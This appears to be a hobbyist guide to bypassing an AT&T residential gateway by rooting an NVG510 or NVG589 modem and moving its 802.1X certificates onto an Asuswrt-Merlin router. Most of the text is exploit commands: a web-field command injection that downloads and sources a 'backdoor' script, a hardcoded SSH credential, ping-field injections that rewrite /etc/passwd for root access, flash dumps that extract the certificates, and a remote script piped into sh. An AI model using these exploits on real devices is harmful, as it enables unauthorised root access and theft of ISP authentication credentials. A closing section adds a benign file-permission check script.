Using Asuswrt-Merlin to bypass AT&T's residential gateway. (rt-ac68u <--> ~BGW210~ <--> ONT)
This method requires only Asuswrt-Merlin: no pfSense, netgraph, Ubiquiti device, or dumb switch is needed.
I only tested with rt-ac68u, but the method should work for all Asuswrt-Merlin based wireless routers (please let me know if it doesn't).
With this setup, the home router connects directly to the optical network terminal (ONT), so you should set up its firewall wisely.
The certificates extracted from both the NVG510 and the NVG589 work; however, the NVG510 costs less and is easier to root.
Credit: earlz
python -m http.server
or python -m SimpleHTTPServer for Python 2
nonce
and copy the value shown in quotes. This value changes every time the page is loaded! Example: 815a0aaa0000176012db85d7d7cac9b31e749a44b6551d02
errrr && wget http://YOUR_LOCAL_IP:8000/backdoor.nvg510.sh -O /tmp/backdoor.sh && source /tmp/backdoor.sh && errr
telnet 192.168.1.254 28
The username is admin and the password is your modem's access code, written on the label of the modem!
to switch to a root shell
python -m http.server
or python -m SimpleHTTPServer for Python 2
wget http://YOUR_LOCAL_IP:8000/busybox-mips -O /tmp/busybox
chmod +x /tmp/busybox
/tmp/busybox dd if=/dev/mtdblock4 of=/tmp/mfg.dat bs=1k
mkdir /tmp/images
mount -o bind /tmp/images /www/att/images
cp /tmp/mfg.dat /www/att/images
cd /tmp
tar cf cert.tar /etc/rootcert/
cp cert.tar /www/att/images
Credit: nomotion
ssh remotessh@192.168.1.254 (password: 5SaP9I26)
ping -c 1 192.168.1.254;echo /bin/nsh >>/etc/shells
ping -c 1 192.168.1.254;echo /bin/sh >>/etc/shells
ping -c 1 192.168.1.254;sed -i 's/cshell/nsh/g' /etc/passwd
exit
and ssh back in: ssh remotessh@192.168.1.254 (password: 5SaP9I26)
!
It switches to a root shell.
mount mtd:mfg -t jffs2 /mfg && cp /mfg/mfg.dat /tmp/ && umount /mfg
cd /tmp
tar cf cert.tar /etc/rootcert/
cp cert.tar /www/att/images
cp /tmp/mfg.dat /www/att/images
Credit: Streiw
Credit: devicelocksmith
I cannot use the built-in wpa_supplicant v0.6 in Asuswrt-Merlin to achieve my goal, so I compiled wpa_supplicant v2.7 from the Entware repository. The necessary binary files are provided here. If you are working on a different model, you may need to compile wpa_supplicant from source. Check this.
python -m http.server
wget https://raw.githubusercontent.com/bypassrg/att/master/packages.tar.gz && tar -xzf packages.tar.gz
wget http://YOUR_LOCAL_IP:8000/EAP-TLS_8021x_XXXX.tar.gz
mkdir /jffs/EAP && tar xzf EAP-TLS_8021x_XXXX.tar.gz -C /jffs/EAP
ca_cert="/jffs/EAP/CA_XXXX.pem"
client_cert="/jffs/EAP/Client_XXXX.pem"
private_key="/jffs/EAP/PrivateKey_PKCS1_XXXX.pem"
wget -O - https://raw.githubusercontent.com/bypassrg/att/master/entware_jffs.sh |sh
uname -rm
If you are not using armv7, you must use the correct Entware installation script.
opkg update
opkg install libubox
echo -e "\ndest opt /opt" >> /opt/etc/opkg.conf
opkg install -d opt libubus_2018-10-06-221ce7e7-1_armv7-2.6.ipk
opkg install -d opt hostapd-common_2018-12-02-c2c6c01b-6_armv7-2.6.ipk
opkg install -d opt wpa-supplicant_2018-12-02-c2c6c01b-6_armv7-2.6.ipk
opkg install fake-hwclock
echo -e "\n/opt/usr/sbin/wpa_supplicant -s -B -Dwired -ieth0 -c/jffs/EAP/wpa_supplicant.conf" >> /opt/etc/init.d/rc.unslung
/opt/usr/sbin/wpa_supplicant -dd -Dwired -ieth0 -c/jffs/EAP/wpa_supplicant.conf
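Before adding the rc.unslung line, it helps to confirm that the three paths in wpa_supplicant.conf resolve to non-empty files and that the private key on /jffs is not readable by other accounts. The script below is an added example, not part of the original instructions; the function names are hypothetical, the mode-600 expectation is an assumption about good practice rather than something wpa_supplicant enforces, and the sample files are constructed dummies.

```shell
#!/bin/sh
# Added example: preflight check of the files wpa_supplicant.conf points at.

# Print the quoted value of KEY from CONF (first match only).
cfg_value() {
    sed -n "s/^[[:space:]]*$1=\"\(.*\)\"[[:space:]]*\$/\1/p" "$2" | head -n 1
}

# True when FILE has no group/other permission bits set (e.g. mode 600).
owner_only() {
    perms=$(ls -ld "$1" | cut -c5-10)
    [ "$perms" = "------" ]
}

# Print one line per problem; the return status is the number of problems.
check_eap_conf() {
    conf=$1
    problems=0
    for key in ca_cert client_cert private_key; do
        path=$(cfg_value "$key" "$conf")
        if [ -z "$path" ]; then
            echo "$key: not set in $conf"
            problems=$((problems + 1))
        elif [ ! -s "$path" ]; then
            echo "$key: $path is missing or empty"
            problems=$((problems + 1))
        elif [ "$key" = private_key ] && ! owner_only "$path"; then
            echo "private_key: $path is readable by group/other, chmod 600 it"
            problems=$((problems + 1))
        fi
    done
    return "$problems"
}

# Constructed sample (hypothetical helper): dummy files in a temp directory,
# named like the page's /jffs/EAP files, with a world-readable private key.
make_sample() {
    d=$(mktemp -d)
    for f in CA_XXXX.pem Client_XXXX.pem PrivateKey_PKCS1_XXXX.pem; do
        echo dummy > "$d/$f"
        chmod 644 "$d/$f"
    done
    printf 'network={\n  ca_cert="%s"\n  client_cert="%s"\n  private_key="%s"\n}\n' \
        "$d/CA_XXXX.pem" "$d/Client_XXXX.pem" "$d/PrivateKey_PKCS1_XXXX.pem" \
        > "$d/wpa_supplicant.conf"
    echo "$d"
}
```

On the router, run check_eap_conf /jffs/EAP/wpa_supplicant.conf after sourcing the script; a zero status means all three files were found and the key is owner-only.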
Some useful links